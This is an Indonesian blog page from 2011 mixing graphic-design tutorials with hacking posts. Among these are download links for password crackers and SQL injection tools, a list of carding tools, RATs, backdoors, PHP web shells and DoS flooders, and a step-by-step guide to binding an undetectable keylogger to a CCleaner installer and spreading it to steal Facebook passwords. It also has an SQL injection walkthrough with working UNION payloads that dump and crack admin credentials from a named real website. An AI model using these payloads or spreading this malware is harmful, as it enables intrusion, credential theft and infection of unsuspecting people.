Pages

Subscribe:

Blogroll

Labels

Selasa, 30 Agustus 2011

SQL Injection Hack tool untuk hacking situs web dan database


SQL Injection Hack tool untuk hacking situs web dan database

Safe3SI adalah salah satu alat uji penetrasi penggunaan yang paling kuat dan mudah yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database. Muncul dengan mesin deteksi kick-ass, fitur banyak ceruk untuk tester penetrasi tertinggi dan berbagai switch yang berlangsung dari database sidik jari, lebih mengambil data dari database, untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi melalui out-of-band koneksi.


Fitur


* Dukungan penuh untuk http, https website.
* Dukungan penuh untuk Basic, Digest, NTLM otentikasi http.
* Dukungan penuh untuk GET, Post, Cookie injeksi sql.
* Dukungan penuh untuk MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase dan sistem manajemen database SAP MaxDB.
* Dukungan penuh untuk empat injeksi teknik SQL: buta, kesalahan-based, query UNION dan tebak gaya.
* Powerfull AI mesin untuk tipe injeksi recognite otomatis, tipe database, sql injeksi cara terbaik.
* Dukungan untuk menghitung database, tabel, kolom dan data.
* Dukungan untuk membaca, daftar dan menulis file apa saja dari server database file system yang mendasari ketika software database MySQL atau Microsoft SQL Server.
* Dukungan untuk mengeksekusi perintah sewenang-wenang dan mengambil output standar mereka pada database server sistem operasi yang mendasari ketika software database Oracle atau Microsoft SQL Server.
* Dukungan untuk ip query domain, web menebak jalan, md5 retak dll
* Dukungan untuk injeksi sql scan.

Download

All Password Recovery Tools


All Password Recovery Tools

-: Beberapa fitur khusus: -
AsteriskPasswordSpy
BrowserPasswordDecryptor
ChromePasswordDecryptor
DigsbyPasswordDecryptor
DreamweaverPasswordDecryptor
ExcelPasswordRecovery
FacebookPasswordDecryptor
FilezillaPasswordDecryptor
FireMaster
FiremasterLinux
FirePassword
FirePasswordViewer
FlashfxpPasswordDecryptor
FTPCommanderPasswordDecryptor
FTPPasswordDecryptor
FTPPasswordSniffer
GooglePasswordDecryptor
IDMPasswordDecryptor
IEPasswordDecryptor
iTunesPasswordDecryptor
JDownloaderPasswordDecryptor
KeychainRecovery
MailPasswordDecryptor
MessengerPasswordDecryptor
MirandaPasswordDecryptor
MSNLivePasswordDecryptor
MyspacePasswordDecryptor
MysqlPasswordAuditor
NetworkPasswordDecryptor
OperaPasswordDecryptor
OrbitPasswordDecryptor
OutlookPasswordDecryptor
PaltalkPasswordDecryptor
PDFLocker
PDFPasswordRecovery
PDFUnlocker
PidginPasswordDecryptor
RarPasswordUnlocker
SafariPasswordDecryptor
SmartftpPasswordDecryptor
SXPasswordSuite
ThunderbirdPassDecryptor
TrillianPasswordDecryptor
TwitterPasswordDecryptor
WordPasswordRecovery
XfirePasswordDecryptor
YahooPasswordDecryptor
ZipPasswordUnlocker

Download Here

Download Best Password Hacking Cracking Tools 2011


 Best Password Hacking Cracking Tools 2011
 ini Password Hacking Terdiri dari berikut Peralatan Sandi Info Hacking:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker.
4. SQL Password Remover
5. Microsoft Office Password Remover.
6. Microsoft Windows Vista Password Remover.
7. Rar File Password Cracker
8. Jendela Password Recovery Kit
9. Password Changer.
10. Distributed File Recovery Sandi ..
dan banyak lagi ..


Sebagai nama alat menunjukkan password Kit lengkap hacking. Jadi orang Nikmati Hacking alat Terbaru ..

Cara Penggunaan??
1. Download Kit Sandi Hacking Di Bawah:
DOWNLOAD

2. Ekstrak file dan Instal.

3. Kemudian Registered mereka dan menggunakannya. (Semua alat berisi kunci seri penuh dan patch) ...

Cara Hack Account Fb Dari Jarak Jauh

 
 
Cara Hack Account Fb Dari Jarak Jauh

Halo teman-teman saya hari ini akan menjelaskan kepada anda cara hack password Facebook atau akun dari jarak jauh dengan menggunakan keylogger. Sistem kerjanya 100% hack dan Anda dapat dengan mudah hack akun Facebook atau password menggunakan hack ini. Dalam tutorial ini saya akan menjelaskan kepada Anda bagaimana untuk hack Facebook dan password lain dari pengguna manapun menggunakan 100% keylogger FUD. Keylogger dalam tutorial ini kita akan bahas adalah L33ts keylogger dan 100% FUD (sepenuhnya tidak terdeteksi).


Hacking account Facebook sangat mudah dan hanya memerlukan tidak lebih dari 10 menit kerja. Jangan khawatir saya juga akan memberitahu Anda bagaimana untuk melindungi account facebook anda atau password dari hacks tersebut dan hacker. Tapi untuk ini anda harus tahu bagaimana hacker hack account facebook anda. Jadi pertama saya mengajarkan anda cara hack account facebook jarak jauh dan kemudian saya akan memberitahu bagaimana melindungi diri dari ini.

CATATAN: Tutorial ini hanya untuk tujuan Pendidikan yaitu untuk membuat Anda sadar hacker dapat hack account . Tolong jangan menyalahgunakan trick ini. T.B tidak bertanggung jawab atas segala kerusakan yang disebabkan oleh Anda.

Jadi Ways mari kita mulai hacking akun Facebook atau password ....

Langkah-langkah untuk hack account menggunakan keylogger:


1. Membuat Server keylogger untuk hack password.
2. Ekstrak Icon dari installer.
3. Bind server keylogger dengan setup perangkat lunak.
4. Bagaimana untuk menyebarkan keylogger Anda atau mengirimkannya ke teman Anda untuk hack Facebook atau password.

Step 1. Membuat Keylogger Server


1.Download Keylogger

Download
 

2. Ekstrak file, Sekarang Anda akan mendapatkan dua folder:
a. Pertama satu berisi Keylogger dan Binder
b. Kedua alat Berisi sumber daya hacker. (untuk mengekstrak ikon dari installer).
(Matikan AntiVirus Anda Sebelum Mengextrack File)

3. Sekarang buka keylogger. Ini berisi dua file satu untuk email gmail dan lainnya untuk password. Untuk membuat satu account di Gmail uji dan masukkan rincian itu dalam hal ini.



(Click Gambar Untuk Memperbesar)

4. Setelah memasukkan email dan password. Setel interval waktu biasanya ditetapkan 3 menit yaitu setelah berapa banyak waktu yang Anda inginkan untuk menerima log dari pengguna.
5. Sekarang klik pada mengirim email verifikasi. Mail ini adalah untuk menguji bahwa keylogger Anda bekerja dengan benar atau tidak.
6. Setelah Anda mengklik ini Anda akan menerima email konfirmasi di test account yang akan mengkonfirmasi keylogger yang bekerja.
7. Sekarang klik generate untuk mengatur mutex tersebut (setiap kunci rahasia untuk membuat keylogger Anda FUD) dan kemudian klik pada compile server.
8. Sekarang simpan file ke desktop atau di lokasi lain pilihan Anda. Sekarang server Anda sudah siap namun dapat dengan mudah dideteksi.

Langkah 2: Ekstrak file Icon dari installer (hacker sumber daya)



1. Buka folder resource hacker dan buka file reshacker.
2. Sekarang, masuklah ke menu dan buka file setup. Misalkan kita ingin melampirkan keylogger kami untuk file setup CCleaner. Jadi buka setup CCleaner dengan reshacker
3. Sekarang di menu ada satu tindakan tombol klik dan kemudian klik simpan semua reshacker

(Click Gambar Untuk Memperbesar)

4. Sekarang simpan semua reshacker untuk desktop atau di lokasi lain pilihan Anda.
5. Ini terdiri dari dua file satu adalah ikon file dan lainnya adalah file res. Kita hanya perlu file icon, sehingga Anda dapat menghapus file file lain yaitu res.
6. Sekarang kita memiliki Icon of file installer (seperti dibahas di atas setup CCleaner Icon).

Langkah 3: Bind server keylogger dengan software apapun

1. Sekarang Pergi ke folder keylogger dan buka Binder.
2. Sekarang Klik pada tombol + diberikan di bawah ini untuk menambahkan file.
3. Sekarang tambahkan server keylogger dan mengatur perangkat lunak (misalnya dalam kasus kami itu setup CCleaner).
4. Sekarang di menu Binder, Ke Pengaturan. Ada pilih ikon yang kita telah dihasilkan pada langkah sebelumnya dan menetapkan lokasi file output seperti yang ditunjukkan pada gambar.


5. Sekarang pergi lagi ke menu File di Binder dan klik pada file Bind.
6. Sekarang keylogger binded Anda sudah siap. Sekarang Anda harus menyebarkan atau kirimkan ke korban yaitu teman Anda.

Langkah 4: Cara Penyebaran Keylogger atau mengirimkannya ke korban atau teman

1. Sekarang Anda memiliki satu software file setup dengan keylogger terpasang dengan itu (Dalam kasus kami. kita harus setup CCleaner dengan keylogger terpasang dengan itu.
2. Sekarang Spread keylogger Anda melalui forum. Anda mungkin menjadi anggota dari berbagai forum menggunakannya untuk menyebarkan keylogger Anda dalam bentuk posting perangkat lunak. Dapat menggunakan berbagai perangkat lunak untuk menyebarkan mereka bahwa pengguna sering download.
3. Menyebar melalui Pendrives atau drive USB hard. Misalkan seorang teman meminta Anda untuk perangkat lunak memberikan perangkat lunak yang telah terpasang keylogger

Catatan: Anda juga dapat memasang keylogger dengan gambar juga. Tapi itu bisa dideteksi oleh antivirus. Jadi menghindari jenis seperti hacking.
Jadi tidaklah begitu mudah untuk hack account Facebook siapa pun hanya dalam beberapa menit.

Bagaimana melindungi diri dari hacks?
Pencegahan selalu lebih baik daripada mengobati jadi selalu ikuti langkah-langkah:
1. Jangan gunakan perangkat lunak retak dan tidak men-download dari situs web yang tidak sah.
2. Selalu menjaga antivirus dan anti-spyware up to date.
3. Selalu scan file sebelum memindahkan mereka ke USB.
4. Jangan mengizinkan pengguna lain untuk menggunakan PC password yaitu Anda melindunginya.

Penympanan Online 25GB SkyDrive

Windows Live SkyDrive adalah salah satu bagian dari layanan online keluarga Windows Live. Apa untungnya? Windows Live SkyDrive lebih disedikasikan sebagai media penyimpanan yang bersifat general. Anda dapat menyimpan file ber-ekstensi apa pun di Windows Live SkyDrive sampai 25GB, hebat bukan. Dengan ukuran ini anda bisa menikmati file online kapanpun dan dimanapun tanpa perlu susah-susaah bawah flashdisk 4GB atau 8GB yang penting anda sedang online.Yang menarik lagi bahkan pada fasilitas windows live ini anda bisa membuka Ms. Word, Ms. Excel, Ms. Power Point langsung secara online. Ngak perlu ada laptop. Dimana saja anda ada entah sedang pakai netbook, tablet pc yang ngak ada officenya tenang saja asal online beres deh. Kebanyakan cerita yah! Sori bos .... kita langsung berangkat saja yah karena filenya banyak jadinya saya simpan dalam bentuk pdfklik saja disini

Search Engine Untuk Hackers



Sebuah mesin pencari baru telah diperkenalkan disebut "Shodan" yang memungkinkan Anda menemukan komputer tertentu (router, server, dll) menggunakan berbagai filter. Beberapa juga telah digambarkan sebagai sebuah direktori port scan publik atau mesin pencari banner.

Mesin pencari web, seperti Google dan Bing, yang besar untuk menemukan situs web. Tapi bagaimana jika Anda tertarik dalam mencari komputer menjalankan bagian tertentu dari perangkat lunak (seperti Apache)? Atau jika Anda ingin tahu versi dari Microsoft IIS adalah yang paling 
populer? Atau Anda ingin melihat berapa banyak FTP server ada? Mungkin kerentanan baru keluar dan Anda ingin melihat berapa banyak host itu bisa menginfeksi? Mesin pencari web tradisional tidak membiarkan Anda menjawab pertanyaan-pertanyaan.

Hal-hal berikut ini dapat dicari:

     negara: 2-huruf kode negara
     nama host penuh atau parsial: hostname
     Net : jangkauan IP menggunakan notasi CIDR (ex: 18.7.7.0/24)
     port: 21, 22, 23 atau 80


Seperti yang kita [sebagian dari kita] dapat memahami, sangat mudah untuk menemukan host yang rentan hanya dengan melihat semua tanggapan banner ditunjukkan oleh Shodan. Ini bisa berubah menjadi ancaman besar sebagai skiddies banyak bisa memeriksa host anonim sepanjang jam untuk mengeksploitasi tertentu atau sesuatu yang mereka mengerti dengan baik.

Klik di sini untuk pergi ke Shodan    DISINI

Corel Draw - Membuat Desain Stempel

CorelDRAW , Nah Kali ini saya akan memberikan tips bagaimana membuat desain stempel
Langkah pertama buat objek berbentuk lingkaran dengan diameter 35 mm



Copy lingkaran tersebut, kemudian ubah langsung diameternya menjadi 23 mm





Nah, Sekarang buat guide untuk teksnya, copy lagi bentuk lingkaran yang kecil dan rubah diameternya menjadi 25 mm, beri warna merah, caranya klik kanan pada warna merah pada color palette


Kini kita hanya butuh 3/4 dari seluruh lingkaran merah, aktifkan lingkaran merah kemudian pada property bar pilih bentuk Arc


Gunakan Shape Tool untuk menarik sudut dari lingkaran seperti gambar disamping


Buat satu guide untuk tulisan dibawah, dengan mengcopy lingkaran merah, kemudian dengan shape tool tarik sudutnya seperti berikut:


Sekarang Ketik Teks: CV. WAHANA JAYA KOMPUTER, Font yang saya gunakan type: IMPACT: Size: 12
Aktifkan teks tersebut dan klik menu TEXT >> Fit Text To Path , Lalu klik lingkaran merah atas


Untuk teks bagian bawah sama prinsipnya dengan cara diatas, ketikkan teks "LANGKAT"




Hilangkan warna merah pada lingkaran guide, dengan cara aktifkan / klik gluide tersebut menggunakan shape tool kemudian, klik kanan icon paling atas pada color paletee


Beri tanda bintang diantara teks, atau pertebal beberapa point

Hasilnya:

Stempel logo

Untuk hasil lebih nyatanya bisa digabung dengan tutorial Effect Stample CorelDRAW dari mas Ervyn

semoga bermanfaat bagi yang ingin Belajar Coreldraw....

Hack Tools My Collection

H4ckingworld HaCK Suite v1.0 ## Ini adalah software hack koleksi saya
link download semuanya ada di dalam
semua daftar software ini sudah saya gabung dalam 1 folder


Use These Tools Carefully and use only at your own risk......................

!!! $$$ !!!

Cmaster
CC Verify
CWizard
THCC

Visa Card Generator 06
Carcabot_Mass_Email
CcHack
CC-Fake
 cvv2c

DesertCVV2
id-fake
Paypal-Link-Spoofed-Scam
HoW To Get Credit Cards Fresh And Fastest
AIO

uploader for all
Cool Small Usefull Dp
ANONIMITY

Jap
BINDER&PACKER

ees binder v1.0
NT Packer v2.1
NakedBind v1.0
Aspack 2.1
F.B.I. Binder
AFX Executable Binder PRO
Deception v4.0
coolbind22
Binder v2.1
Deamon Crypt v 2.0
AmkoJoiner
MultiBinder v1.4.1
MicroJoiner v1.7
Pretator v1.6
YAB Binder v 2.0
BRUTER

WebCrackv4.0
BrutuS
Crack FTP
FTP Brute Hacker
phpbb bruteforcer
PhpBB pass extractor
phpBB Cracker
Email Cracker
FTP Brute Forcer
EXPLOIT COLLECTION

10377 Exploit
SMF ShoutBox Xss & Html Inj
SMF Ultimate Shoutbox Cookie Disclosure Exploit
Firefox_BuG
FLOOD_DOS

Flowbabeflow
FreeSiteKillerV2.01
webxgrab
Web Attacker ENG
TheRapist - DoS Attacker
HybridFlood2
Anti-russ 3.0
Http Bomber v1.001b
Sprut
DoS_5
etherflood
DoSAttacker
phpBB Dos
phpBB Attacker
Ping Attack
Site Nuke
Divine Intervention
UC Forum Spammer
Inferno Nuker
Multiple Site FlooD
GOOGLE HACKING

Alt-GooGle
Google Version 1.2
Google H4ck3r
GooLink
KEYLOGGERS

Elgolf 1.0 Beta
ESK KeyLogger
Glog Keylogger
HermanAgent
IKlogger0.1
MESSENGER

MSN Extreme 3.0
winks,moods,muggins,weemees and meegos + Installer
MSN Messenger Account Cracker v2.0
Hotmail Email Hacker
Hotmail HAcker Gold
HotmailHack
yahooUltraCracker
MSN Spy Lite v1.0
Yahoo Hack !
SH Yahoo Pass Sender 1.1
Yahoo Password Decoder
OTHER BACKDOOR

all in one shell backdoor
assh0le backdoor
blowdoor30c
intestinal worm backdoor
NST Back Connect Backdoor
All RooT
backd00r
genie v151
m0trix
Private Backdoor
PASSWORD CRACKERS

rainbowcrack-1.2-win
md5_cracker
Jhon 1.7 Win
mdcrack-1.2
hydra-4.6
PHP SHELL'S

c99shell
r57shell
BackDooR (fr)
Defacing Tool Pro v2.5
nstviewshell
PHP Backdoor v1
PHP_BackDoor_v1.5
PHP_Shell_v1.7
Simple_PHP_BackDooR
RAPID SHARE & CO HACKING

Link Grabber 3.0.4
Rapidshare Hack
RapidGet
RapidSearch.Beta.0.1
Rapid*****erv4.4.87
MaC Rapid
Premium Account Checker
RapidMule
RapidShare Anti*****
RapidShare Checker
RapidShare Decoder
Renew IP
RapidUp
The Grabber 1.4.1
Unlimited RapidShare With I.E.
SCANNER

SuperScan 4
Stealth - HTTP Scanner v1.0 build 23
CGI Vulnerability Scan
CGI Scanner v4.0
Legion NetBios Scanner
CGI Founder v1.043
Scanarator
SuperScan 3.0
Blues Port Scanner
NetBIOS Name Scanner
MooreR Port Scanner
Trojan Scanner 1.0 Modded By RooT
nmap 4.03
SECURITY

Kism 0.2
SQL Injection

sqlbftools
sqldict
forcesql
sqlinjector
sqlping
SQL INJECT Commander
SQLPowerInjector
TROJAN & RAT

SKD Rat 2.0
Combined Forced Rat Beta
Gadu-Ghost Trojan v.2.3
ProRat SE 1.8
Cyn v2.1
MofoTro 1.1
Furax 1.0b
Omerta 1.3
Remote Dark Trojan
X Rat v3.3
TGA Backdoor v2.0
TUTORIAL & TEXT

Defacing
Hacking_GMail
Hackers Black BooKs
Wireless Network Cracking ToolS

AirCrack
Kismet


DOWNLOAD HERE:
 
 
ATAU

Tutorial Merubah Warna Rambut Dengan Photoshop

Anda ingin mewarnai rambut tapi takut rambut jadi rusak? Solusinya gampang, warnai saja secara virtual. Berikut tutorial mewarnai rambut ala photoshop....

Intinya sederhana sekali, tinggal mengganti warna rambut yang hitam misalnya, dengan warna lain. Namun ternyata tidak semudah itu. Dengan mengganti warna, tekstur rambut menjadi hilang dan hasilnya tidak karuan... Tutorial ini menggunakan efek variations dalam mewarnai rambut yang tetap menjaga tekstur rambut sehingga mendekati aslinya..

langkah-langkahnya:


- Buka file yang ingin anda edit, seperti ini contohnya


mewarnai rambut

- Seleksi dulu bagian rambutnya saja dengan selection tool, bisa itu lasso tool, magnetic lasso tool atau quick selection tool. Zoom gambar agar lebih mudah diseleksi

variations

- Pilih menu image - adjustment - variations. Selanjutnya kotak variation akan muncul. Nah, inilah preview efek-efeknya

edit warna rambut

- Tinggal anda pilih mau kasih warna apa. Bisa juga di tambah warnanya dengan meng-klik salah satu preset, seperti more red dsb.
- Klik OK dan selesai efeknya. Maka rambut pun akan berubah warna TANPA menghilangkan tekstur rambut.

ganti warna rambut

Semoga berguna dan selamat bereksperimen.

Tips:
Anda dapat menggunakan feather untuk menghaluskan pinggiran efek. Pilih menu Select - modify - feather dan beri nilai antara 1 - 3 px.

Corel Draw - Membuat Undangan Simple dan Indah

Nah Kali ini saya akan memperagakan tips - tips bagaimana membuat desain undangan

Pertama-tama kita membuat kotak merah
tutorial coreldraw

Lalu dari kotak itu tekan CTRL+C lalu dilanjutkan CTRL+V yang dimaksudkan mengkopi bangun itu di tempat yang sama. Warnai kotak kedua dengan warna kuning.

tutorial coreldraw



Selanjutnya tekan CTRL+Q untuk mengubah objek kotak itu menjadi vector.
Tekan F10 untuk shape tool. Bengkokkan tengah garis ke bawah.

tutorial coreldraw

Lalu tekan F11 dan akan muncul panel Fountain Fill
tutorial coreldraw

Kolom type linear diganti dengan conical dan pilih custom
tutorial coreldraw

Mulanya, kolom bagian pewarnaan ada 2 saja antara putih dan hitam. Tapi langsung klik 2X pada segitiga di bagian  pewarnaan untuk menambah pewarnaan. Terus pada kotak siluet itu pada mulanya di tengah, seret sendiri ke kanan bawah seperti gambar diatas.
Hasil akan tampak seperti dibawah :
tutorial coreldraw

Lalu samarkan dengan transparancy tool
tutorial coreldraw

Hasil tampak seperti dibawah :
tutorial coreldraw

Lalu buat bangun bintang dengan menu complex star tool
tutorial coreldraw

Lalu tarik complek star itu ke kanan dengan menu interaktiv distortion tool
tutorial coreldraw

Dan warnai hitam untuk sementara. Copy menjadi 4 yang bersinggungan dan kasih efek transparan dengan interaktive transparancy tool dari kanan ke kiri. Seperti pada gambar dibawah :
tutorial coreldraw

Lalu masukkan ke kotak merah yang tadi dengan menu effect => power clip => place inside container
tutorial coreldraw

Hasil akan tampak seperti gambar bawah :
tutorial coreldraw

Klik kanan pada gambar lalu edit content
tutorial coreldraw

Tarik ke kanan atas dan warnai putih. Setelah itu klik kanan lagi, pilih finish edit.
Dan kalau digabungkan dengan pembuatan garis pelangi yang tadi akan tampak seperti dibawah :

tutorial coreldraw

Perlu diingat, bangun lengkung pelangi harus berada diatas kotak yang telah diisi dengan motif bunga.
Setelah itu masukkan gambar pengantin yang saya sediakan untuk didownload.
tutorial coreldraw
untuk download klik link ini

Nah, dari sini kasih background sinar pada gambar pengantin itu dengan tool interactive drop shadow tool. Lihat gambar bawah

tutorial coreldraw

Tinggal kasih tulisan dech….
tutorial coreldraw
Desain Undangan
(Anda dapat mendownload hasil jadinya pada Layanan Ilmugrafis di bawah ini)

Disini saya pakai font type Alison. Sistemnya sama, ditulis dahulu lalu diwarnai hitam dalam dan hairline juga. Trus hairline dikasih ketebalan 2 pt. lalu copy dan paste ditempat yang sama dengan warna kuning. Tetapi untuk copiannya ini tidak diberi hairline, alias none. Selamat mencoba dan membuat kartu undangan anda sendiri.
semoga bermanfaat bagi yang ingin Belajar Coreldraw.....

SQL Injection | Step by Step deface website

[IF U ARE INDONESIAN PEOPLE OR OTHER , USE THE TRANSLATE TOOLS ON THE RIGHT SIDE]
What is SQL injection ?

SQL stands for Structured Query Language. It is very high level language,I mean close to humans.
Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to
design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see
the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.Example the webpages links in format 
www.anything.com/something.php?something=something, example 
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to database and it returns the results accordingly. Lets attach a single quote at the end (') that is
www.tartanarmy.com/news/news.php?id=130'
and we got an error on the screen because it included the single quote (') while processing the results. It assures us that it didn't filter our input and is vulnerable to attack.




Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in it and finally data is stored in columns.





  


We Have chosen database "explore_hacking" from six databases. Its has four tables admin,articles,products,subscribers. Each table has further columns and data stored in them . For example we chose 'admin' table, it has columns id,username,password,email.

 What is information_schema ?
It is information database present in all SQL database severs(version>5) by default. It contains
information like names of tables,columns present in all other databases. 

We have opened database "information_schema" which is present by default and the table named as "TABLES" in database.





SQL Injection Tutorial :- 
 This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.

Step1.Find number of columns.
Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number, 
say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it sort the result by 10th column. But it returned us with an error,this
means number of columns are less then 10. Lets replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
Finally we reach on '6'
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
we didn't get any error, this means there are 6 colums.

Step 2.Find vulnerable columns.
Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.


Step 3. Find database version.
Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that version is 5 point something that
is greater than 5. We would have followed some other approach in case the version would be
less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.

Step 4. Finding table names.
Replace vulnerable column no. with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
 information_schema.tables where table_schema=database()--
 Click here
We got first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()-- Click here

Step 5.Finding column names.
Simlary get all the columns by simply replacing 'table' with 'column'
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()-- 
Click here
There is a repeating element like in this case is 'id' .From it, we come to know which table number
has which columns. 

Step 6.Fetching data from columns. 
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But passwords are encrypted.
Mostly these encryptions are crackable. Lets choose any username say 
"Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
And it would crack for us. We got 'oorwullie' in result ( password in clear text).


Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 
Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
There is any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.



So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms. 

lancarklik.com

Lancarklik
About The Author
Nama saya Yudi Aditya, Saya Bukan Seorang Blogger, Desainer atau Apapun Tapi Saya Hanya Seseorang Yang Ingin Selalu Belajar dan Ingin Tahu Sesuatu Yang Baru...